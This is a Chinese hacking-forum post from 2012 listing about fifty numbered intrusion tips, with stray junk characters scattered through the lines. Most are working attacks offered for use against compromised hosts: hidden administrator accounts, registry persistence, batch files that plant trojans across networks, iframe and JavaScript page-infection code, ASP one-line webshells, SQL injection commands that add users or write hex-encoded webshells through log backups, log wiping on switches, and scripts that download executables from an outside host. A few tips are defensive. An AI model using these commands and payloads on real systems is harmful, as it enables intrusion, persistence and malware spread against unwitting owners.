中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 z1 D( @5 ~. Z3 Lcacls C:\windows\system32 /G hqw20:R0 h! Q- H3 Q# G8 j" u/ `) ~
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
  s$ F& A1 S* Z7 O1 c恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F1 T4 B) S5 V0 }
# D$ G6 w+ N* A/ x! m4 Y8 @: u
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, M2 m, P; }: m# P9 E8 _& l
( e) l2 ]% g; {: d0 x
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" B. Y6 [6 i) Y) S4 e
4 p% q, H  Q4 M4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 l: K0 t3 W, D# m2 O

* [% Y6 E2 U6 t5、利用INF文件来修改注册表
2 G  w7 S( T( X2 \- @+ A[Version]9 s3 o9 L! y& Z7 Q
Signature="$CHICAGO$"
2 J, `& i! M! a1 V: @[Defaultinstall]9 t2 [- }4 y8 B6 K9 }0 g2 z
addREG=Ating. `. D4 J4 O- m( |" ]3 k
[Ating]
4 o+ J( F" r8 W% |  bHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
6 J1 M' a3 x7 u: y以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( n# `* T$ W" X7 C: w' @& Frundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径$ V( T! J+ C, F8 W* [* j* C. W& A0 ]
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
# ~8 ?6 \5 \/ i! J- {0 ^& uHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU/ }! W6 L; s, e. S( m4 C
HKEY_CURRENT_CONFIG 简写为 HKCC
2 \) A' a) M' l4 M0 g0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) ^/ |7 z, \  O+ i9 Q) e+ y
"1"这里代表是写入或删除注册表键值中的具体数据
$ p& S5 y' N: A" U+ [
. n# [: G4 q0 B6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
( `3 G& M% D) f6 l4 {; ]多了一步就是在防火墙里添加个端口,然后导出其键值
2 q* |- J% N3 b8 E[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]$ R+ S; }- V, G9 \1 u/ M& ~9 A" Q$ Y

5 d& O% C# E% [4 \7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 N# C) f" R: X5 x
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。1 u# G6 e" o& |9 w6 n9 q

! \) [* F( k8 Y6 f8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 u4 ~0 v6 m5 f+ F  M$ n; y3 N
. q" t+ N) k% T$ @. \& y
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 N  A0 H. L5 ?. z5 Z- T) s2 F: [可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。. d6 d0 H2 O) N7 n4 K% a7 S
4 c7 O8 m6 |6 X. R" V( Z9 h
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”( X4 _! z' [' f/ D
7 u/ f: W) U6 Z! z
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,1 A8 I& [4 k; U3 [& P. Q
用法:xsniff –pass –hide –log pass.txt) @. o5 k: f# `4 r
5 A4 [. X' U7 L1 w7 y( [
12、google搜索的艺术1 w: }# C1 a) i4 v
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
. O/ U" ?7 K0 v/ ^! r' I或“字符串的语法错误”可以找到很多sql注入漏洞。/ d, ^) F3 G/ ^  a5 {
- B* w. y) j6 ^4 a
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- b6 ^( Y4 M' H  S7 d2 F7 G" Q8 Y7 X; G: T% y# S; ~: O) a
14、cmd中输入 nc –vv –l –p 1987, T1 ^7 M6 W  V- k. r
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃  O& @  E+ D  W

( a: M# r& I0 F8 p4 M. M0 D15、制作T++木马,先写个ating.hta文件,内容为. m' A4 `4 d3 d3 s, n
<script language="VBScript">
9 g. D1 b. q) Xset wshshell=createobject ("wscript.shell" )6 Y5 p9 q* I- A, f3 G
a=wshshell.run("你马的名称",1)
9 l# M$ [# l* Q- L8 y; `6 G! gwindow.close5 f: Q: L0 ^% V! K) l* y3 M
</script>
% Z4 `  u3 d9 c4 R/ t再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: Y& J  J8 O# \( ~$ b" |& a$ n2 M7 b4 G
16、搜索栏里输入( B! |/ \% N  m' y" \
关键字%'and 1=1 and '%'='
# I9 n" ?! @: r. u关键字%'and 1=2 and '%'='
" t( M# q* Z$ b. f" Z: u比较不同处 可以作为注入的特征字符1 x1 x6 y# n$ g3 K# G( A; w5 B5 Z7 e
" }; i% z" }; v9 r
17、挂马代码<html>; Z8 W4 e) \" \$ }2 e; r3 J
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& K! O% k% y1 J/ z</html>
; a! ^) V3 L/ G5 s$ n7 D! {, T& [$ c3 X, y
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,3 X7 U8 }3 |! j6 f6 r
net localgroup administrators还是可以看出Guest是管理员来。3 J. ~7 y+ g" E" ]
1 Y" J* F+ K: V! g3 i" z/ ^, T7 ]3 H
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 w4 M- ]2 Q$ b! v! l
用法: 安装: instsrv.exe 服务名称 路径- Q* F" L: c! a$ g4 v
卸载: instsrv.exe 服务名称 REMOVE
2 o5 j+ Z* B5 @. J9 T5 \# V  X5 j  w8 U3 C: y
) Q# o! X' E5 G# F0 b
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉4 h+ V6 j7 ^9 F" s6 l( O
不能注入时要第一时间想到%5c暴库。; g2 Q. S# o  N2 L( E0 e$ z- B& c

1 O  p& \" Q3 S; o5 d4 n22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ s3 m% H3 B6 T$ ^, s0 Q& o- y( h. ]5 B% X3 b; t
23、缺少xp_cmdshell时
2 v* T% @$ l3 O- M8 u尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- N* }; O; G% T0 J2 \假如恢复不成功,可以尝试直接加用户(针对开3389的)- e4 @. R3 B7 O- Z6 V
declare @o int, L: y- d% A& A. R4 T8 W/ Q
exec sp_oacreate 'wscript.shell',@o out& P  f3 ?7 U! F6 i. Z! t: v: H% j% }, ]3 r
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 }: R, q6 j3 Y" Q% C- t9 k0 Y8 G

0 B, a( k3 i$ K24.批量种植木马.bat. g1 l; ~# m7 e
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 i7 f2 `/ _6 a+ K8 g1 O: Jfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
, V3 x8 ]% b" T+ n6 X  A& Y扫描地址.txt里每个主机名一行 用\\开头3 V2 B$ k  c* }0 [/ a3 b' Q1 i

2 q6 ]0 J  \6 x- ~2 ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 X+ K$ K. P/ E  k# s5 G- E0 ~8 v. T) P* V9 S
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
. [8 E0 @, p& I/ z" X将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ z, u7 \- G0 J
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马" b5 \0 q! H9 |) L8 E1 C

$ M- A9 _" y: q4 k0 g9 Q5 P27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
. |; |# o, D" A4 {( k+ `( I然后用#clear logg和#clear line vty *删除日志8 h) V- O  v& W; m. O

# ^$ c" D  J: ^. E* N3 N28、电脑坏了省去重新安装系统的方法+ h- F3 s; e* e; [: s* w1 O! ~* Z$ O
纯dos下执行,' ]( G6 F: L5 f  `* I% H
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, z0 b  m; T  m0 q! `, d2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
5 w0 i0 m/ E, T9 V4 h; I9 M( m. I2 I- {# g+ ~1 V) ]
29、解决TCP/IP筛选 在注册表里有三处,分别是:* e7 j  d6 j( N. b: B) q
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip  m% d$ L: f1 U( N5 N8 \
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ U8 B- S1 c) B2 THKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: a5 ], w- ]9 `/ {1 y) |& a. S
分别用
0 t" I  n( ~: a  U- P& w& jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip  H4 \3 K# z9 C; e: O
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: E; g9 X! t% I* S) o0 W- F6 g
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 ^& u( L$ F6 ~, M2 v; b9 f命令来导出注册表项$ c" [- {' H, {5 L- Q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% h8 P! c9 N! y! j+ s
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# p8 c( i* q  J- Bregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。) f% |1 D  r" m9 c5 q: n
# i$ U* w" t- V: f) N! m
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
5 L  N: m  R, t$ e/ aSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的39 x0 ^4 O# L; j7 D$ w  g

3 ~) c7 ]6 H4 G/ b; g/ i( @31、全手工打造开3389工具& L7 g8 |& T- \  U% O  G
打开记事本,编辑内容如下:
5 P2 H+ |( o. w" Cecho [Components] > c:\sql( T; \* U' V" V7 w8 o6 n
echo TSEnable = on >> c:\sql" R5 K( L. k0 t6 \9 ^
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
- v0 C: \* X/ x5 D1 n  z" H( \编辑好后存为BAT文件,上传至肉鸡,执行
) W5 ~  @' v/ P6 w! t( M: S( v- t' P! k! P% Y/ @/ O0 T
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 f/ j. j& a/ O7 e6 g+ R8 B2 t

& C( d0 l6 X, ^) v6 R. Z33、让服务器重启
; ]6 g/ l# b" t; e写个bat死循环:
. R: t" P6 ~/ N. Z0 N; a@echo off4 E5 \6 R* p0 D% y& p
:loop1
6 d! ?7 L$ |$ Q* H0 mcls- w; Y; Q4 Y. \- b$ k3 @# e
start cmd.exe( u! p0 Y+ _9 i+ n9 B
goto loop15 [" ~3 C/ K4 H' u( l7 J" J8 l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 M. v# J7 E1 p' G& @9 O0 q# |3 H) o$ }0 `0 r  _
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
5 C8 x0 k( {& p0 d0 [5 N@echo off
0 s, h$ z( l$ udate /t >c:/3389.txt
& ?7 z& A. A6 ~6 h& Z* a+ q4 K, @time /t >>c:/3389.txt% R+ B* n$ T, ]
attrib +s +h c:/3389.bat+ Y) ]+ U: W+ `5 O
attrib +s +h c:/3389.txt) U% @( R! G' R. {" E& @! W
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt" t# H, r0 F9 j& k
并保存为3389.bat
; F$ L  u+ o. ]8 @打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. m- T. {6 U# u* s9 \) W3 \
' ?8 w- J7 R1 ?2 R: @/ P0 c5 q! R& \" D35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 ]- v3 w# |* U3 {( a
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
/ l$ Q2 n3 J: j9 F输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" w& G: g$ Z* K$ k7 ?) @4 \8 U$ ~
* _. z% ^1 W7 G1 m& ?* L36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 W; d9 ^" F7 l! N$ T  x; k
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 I0 s* A$ g3 x( _5 C/ \4 g0 I. I! @
echo 你的FTP账号 >>c:\1.bat //输入账号7 h5 d* b  d9 y' O1 h* p
echo 你的FTP密码 >>c:\1.bat //输入密码
1 I, Y* w' s% ~echo bin >>c:\1.bat //登入1 P5 a; m" |& K- J
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
3 O; Z3 c+ I( C$ A* techo bye >>c:\1.bat //退出" k% |0 C& a# Q! D6 V6 o5 l5 [# w
然后执行ftp -s:c:\1.bat即可$ r6 k# u* O- Y4 g1 C/ b& a
7 V3 D7 I8 I* b3 ~- |8 U0 b; L3 l
37、修改注册表开3389两法) `& x: _/ i4 T$ V
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表' R/ R7 C. X: c* s" g
echo Windows Registry Editor Version 5.00 >>3389.reg
, Z! l) _( {: v% v8 J0 a) e" Aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
0 ?, r4 Y; s6 s) U$ p  Wecho "Enabled"="0" >>3389.reg
) g3 e) I' U  e0 y3 kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* H$ r+ a* ?; R; D! B' C* N# gNT\CurrentVersion\Winlogon] >>3389.reg
8 z' y# o9 }' T/ M8 wecho "ShutdownWithoutLogon"="0" >>3389.reg
# m1 N* N1 h( `$ |+ [- `echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]/ \. ^$ M; W- T0 X4 d6 c" i+ z0 F
>>3389.reg
( X" E, K+ }) I9 u- ^- ~6 n/ yecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
9 j; x% A6 J9 D9 b4 z- d/ P! L! techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]# c' X) m5 D' S
>>3389.reg
$ R, P* O8 g( `5 c4 necho "TSEnabled"=dword:00000001 >>3389.reg- |4 A5 R4 \7 I- w7 F, A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 Z4 {2 e9 d/ h
echo "Start"=dword:00000002 >>3389.reg) }* I" C+ H7 B! C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]! x- R4 E0 G4 b: @
>>3389.reg3 N9 s, G2 C0 u5 O
echo "Start"=dword:00000002 >>3389.reg
& ]! H9 ]; B1 \3 ^* L% B: Wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
0 J( R* [6 p+ Uecho "Hotkey"="1" >>3389.reg
! w( Z6 N0 `5 I- Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 |) s- y8 |4 f# U$ \- fServer\Wds\rdpwd\Tds\tcp] >>3389.reg1 M( o( u% M0 Q
echo "PortNumber"=dword:00000D3D >>3389.reg- w4 T) y6 O& ?7 C+ p1 |2 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ m6 U) Q6 l  q- s" i# A0 P
Server\WinStations\RDP-Tcp] >>3389.reg
/ J/ R5 P' H" |( l1 z! i# F+ {! cecho "PortNumber"=dword:00000D3D >>3389.reg
4 e5 r5 f0 W: P把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, h( s5 N, [5 h4 s- d1 d(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)" s! M) l$ j. ~/ ~; e7 U
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效! ]7 ]3 V' W% x1 l6 a* P3 a
(2)winxp和win2003终端开启
7 E* M9 k9 k6 B  t8 i& J+ @用以下ECHO代码写一个REG文件:0 Z2 P$ W* h2 J9 d) A$ P$ l/ J
echo Windows Registry Editor Version 5.00>>3389.reg
( b# Q7 n$ x2 V: C5 \2 t  Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* K+ X! e) e8 l2 |  K6 L
Server]>>3389.reg% S. b+ U+ Q' Z. v6 M
echo "fDenyTSConnections"=dword:00000000>>3389.reg
  x+ B0 O/ s" @$ j6 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 j- c: j4 i8 V  G4 {' Y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg% m& F( u/ z  a; Y2 E4 y
echo "PortNumber"=dword:00000d3d>>3389.reg
8 k6 o2 t" c/ O- W# y8 v- X9 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; q) O; G9 i% Q# H
Server\WinStations\RDP-Tcp]>>3389.reg
0 w" `, o# I7 j, ^, Qecho "PortNumber"=dword:00000d3d>>3389.reg
8 \6 e- q( r% J; k' C* W# F% w然后regedit /s 3389.reg del 3389.reg
% ?/ D% U8 R# E, EXP下不论开终端还是改终端端口都不需重启9 X& G) o4 D. d1 h+ \0 j" a
* s3 Q& D% O  u8 o0 }. a% a
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃+ \% }9 S& U: n! H
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
, K6 S' ?  z( @
4 ]3 h& ]6 ]  x% ^/ k; g39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 R% B& Z% l/ B(1)数据库文件名应复杂并要有特殊字符
& g% f- K/ A9 T% t' v(2)不要把数据库名称写在conn.asp里,要用ODBC数据源. g! F6 R/ x( u/ j+ E
将conn.asp文档中的
% p4 s. [, c, z& {0 CDBPath = Server.MapPath("数据库.mdb")" j! c- l4 x- T
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
% R3 W4 H0 [8 _6 X' w& ?: ^' B9 T3 i! y. H. v  @2 n3 s% S5 E; T
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" U- R0 W/ S2 p, B+ s
(3)不放在WEB目录里
2 ^5 Z4 y! T0 I, x# T% L2 |. @5 Y1 Y* ]" H
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉0 C1 v! ?& [/ ]6 g- m( E
可以写两个bat文件6 O0 P+ g7 `3 _" V6 o
@echo off- H! B4 H0 M/ Z. Z' h$ M) X2 ?
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ P- g- V! J$ w# H8 n! I- E@del c:\winnt\system32\query.exe
0 d# L- b& ~; [# s+ k6 b$ n@del %SYSTEMROOT%\system32\dllcache\query.exe
2 Q2 W5 F  T$ l@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的# \9 b- k; G2 h& z3 O2 u' m  d9 F

: p( o& K# h; O@echo off8 ^7 Q! E" X, Z' W/ y. q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe: g% E+ H' ^- K6 \1 x
@del c:\winnt\system32\tsadmin.exe/ b1 o, \  v! u
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! H% ~/ [! S: T3 B4 Q
" j" D& t  P+ e! v6 B41、映射对方盘符
; |+ f2 u2 Z- ]- y: z. U% Ytelnet到他的机器上,- N' p7 e5 }4 V; t' u8 x9 v" N7 i
net share 查看有没有默认共享 如果没有,那么就接着运行$ R! v9 l* H/ B5 B0 v
net share c$=c:
) E- p! y: O1 o& f. h9 Wnet share现在有c$& n2 o6 P3 N% N% _
在自己的机器上运行$ F0 }% M% c; V( P5 U
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K/ v' h/ j! \0 \. m2 a, u5 F
, H% }& X' A. v- x0 B
42、一些很有用的老知识+ x& h: ^$ Y% y; k+ B" S3 u- J6 M
type c:\boot.ini ( 查看系统版本 )1 A. X7 D+ r9 t  M9 g) n
net start (查看已经启动的服务)
% s, x" B- k8 X7 vquery user ( 查看当前终端连接 )* g/ x/ y3 }1 Z; {  f/ b; Y- Z! E2 W* F
net user ( 查看当前用户 )7 Q5 F4 e6 ?' l2 t
net user 用户 密码/add ( 建立账号 )
2 U+ B3 G8 W! j" e9 m1 cnet localgroup administrators 用户 /add (提升某用户为管理员)
' P) E: m7 u& g* R/ ?# H6 vipconfig -all ( 查看IP什么的 )
; m0 }. z! u7 L9 M, N) o5 Fnetstat -an ( 查看当前网络状态 )
# D  L, p2 U9 \6 {& q% Gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码); e' d2 M7 s% t$ U7 S7 {) d( |
克隆时Administrator对应1F4
! Z% G" w) {# i, Hguest对应1F5
% b& f$ X& c9 ^2 [8 {; ?$ `( Ptsinternetuser对应3E8$ y" r) L; N6 y! M- t

* u8 E" J' O& z. _5 [7 R43、如果对方没开3389,但是装了Remote Administrator Service( d/ C; {9 r2 H
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
( ^. R  v2 O+ t+ F解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 X& _2 P3 ?! t; j
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# l; e! y4 ]5 _7 Z$ {1 a; R

  O9 b' S& R: A9 b44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)- m7 A3 ]9 Z3 f7 Y1 g
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). d6 ^' l9 V" _! Z2 m

& C2 ^" }. U% n/ P1 U5 U45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
; x5 d; M1 s- K$ q' kecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
- t  K5 B* y& `( u^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
  i: d3 F7 a" G/ c5 [  Q: X! TCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# _$ ^" r. Q" L0 z( }1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
4 x: G, L. _! K1 v6 r(这是完整的一句话,其中没有换行符)
0 A2 n' E# V/ T- T  {) d5 T& I然后下载:
8 J9 _7 N% I' {: D1 w! H6 }2 v$ `cscript down.vbs http://www.hack520.org/hack.exe hack.exe9 G. Y5 }6 H0 I! E2 B

. C' K! u; Q# e4 p5 j7 }) X, r9 t46、一句话木马成功依赖于两个条件:. ^5 k7 E. a8 O# r4 p) W
1、服务端没有禁止adodb.Stream或FSO组件
% l/ {- B) k8 J. j: D. b- B1 L2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
1 K2 t" K( {0 s& {: q
: M, t! C5 d" b8 l5 }47、利用DB_OWNER权限进行手工备份一句话木马的代码:8 z. T/ W, j+ J: a8 ]( K
;alter database utsz set RECOVERY FULL--
8 {9 ~1 \) K! H  a3 j! {( s, ];create table cmd (a image)--" p% K# M! Q, r7 Z. D6 J$ c
;backup log utsz to disk = 'D:\cmd' with init--
8 v3 g' B. {/ J, Z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# ]9 q5 f: p5 Q$ v;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--/ y) a1 f3 K) A( E, ]1 `$ E
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。9 K( b3 V3 E3 O  s9 m4 U  j
. s3 n( R9 L" X% W
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ P2 j2 H. T: @# L7 m4 d8 q6 b
5 n) u+ p* W9 f6 i& t* R! Z1 a
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
/ v( f& f; ?3 `  h. u1 J* X$ C8 I. H所有会话用 'all'。! Z6 u4 t2 I. M: O
-s sessionid 列出会话的信息。3 {* ]$ ]' S. \% ?
-k sessionid 终止会话。
: A) k9 L; V: y8 j' C3 }7 q  l- ~-m sessionid 发送消息到会话。
8 M1 T6 p9 a0 a3 ]& q0 H& J' |$ j* s0 z& T& X4 Z' |0 u2 f6 B
config 配置 telnet 服务器参数。
" f9 }7 C% l& Y# h: ~/ c" R! ~0 b) z2 P. Q/ X
common_options 为:
8 b: n. N: z1 k0 \9 O  @-u user 指定要使用其凭据的用户- A. Y% P$ M4 |) I, D7 [* o. `
-p password 用户密码
! C5 {: Q9 X. D
6 M/ c7 Z$ `0 f+ V( T  B7 Rconfig_options 为:
$ C# u3 J; U: L5 z0 Zdom = domain 设定用户的默认域( D  d# O! z$ ^+ G
ctrlakeymap = yes|no 设定 ALT 键的映射+ ~& B1 L2 q; q( }1 x6 l9 {) N
timeout = hh:mm:ss 设定空闲会话超时值
1 S7 k) Q; O% V) L  Utimeoutactive = yes|no 启用空闲会话。
& L( T6 w5 i, U' _: O8 D3 Wmaxfail = attempts 设定断开前失败的登录企图数。: ~# U6 d- A4 V
maxconn = connections 设定最大连接数。  t; b: v) t  V
port = number 设定 telnet 端口。  m6 y9 ^- I5 F
sec = [+/-]NTLM [+/-]passwd2 g1 m9 Q3 j2 C8 n. N/ n4 V1 d
设定身份验证机构
0 q0 N, a$ P/ x- C- X5 @0 \fname = file 指定审计文件名。4 f$ V" c5 F3 j7 g9 V% z9 v( w
fsize = size 指定审计文件的最大尺寸(MB)。2 ~( h/ B0 ]' p& S" d
mode = console|stream 指定操作模式。
6 O7 C& G% J3 ]8 r. Lauditlocation = eventlog|file|both
- ~9 l  h) E: _0 C  D指定记录地点7 E; w0 s' U" u+ x( L1 w) o
audit = [+/-]user [+/-]fail [+/-]admin
# e  H) ?) g" f9 B- Z  U6 A7 H9 S& a
49、例如:在IE上访问:9 q# J8 K& }4 \) t' a6 N5 R$ a
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/6 P2 D7 ^. i* t+ f6 U6 k* C. _8 m
hack.txt里面的代码是:, x' n" p+ ~- p* U2 e
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, V$ k! n* i. {$ r把这个hack.txt发到你空间就可以了!
' L+ d  K$ }# O这个可以利用来做网马哦!9 N" R# y9 H, V

+ q+ b; ^* o* G50、autorun的病毒可以通过手动限制!" Z% @: N0 V- i
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
% \3 e  B8 h7 Y! z  w2,打开盘符用右键打开!切忌双击盘符~2 e' s9 V0 D0 @2 Y. P$ c
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!0 ?" Y! z( c9 o- |
! `* F9 C1 t8 a- l2 ^5 q
51、log备份时的一句话木马:
- u5 ?; p+ `, ?# e% M: E2 z) i% pa).<%%25Execute(request("go"))%%25>- q9 R# ~! Y! l' R$ z" T% b& o) V
b).<%Execute(request("go"))%>
% T5 z0 o3 j! qc).%><%execute request("go")%><%
1 m  C( m- @$ Y  G/ @/ f* dd).<script language=VBScript runat=server>execute request("sb")</Script>* p% g; n9 d) s* `% `
e).<%25Execute(request("l"))%25>1 r- @- F; I3 ^" l" ?* \+ o
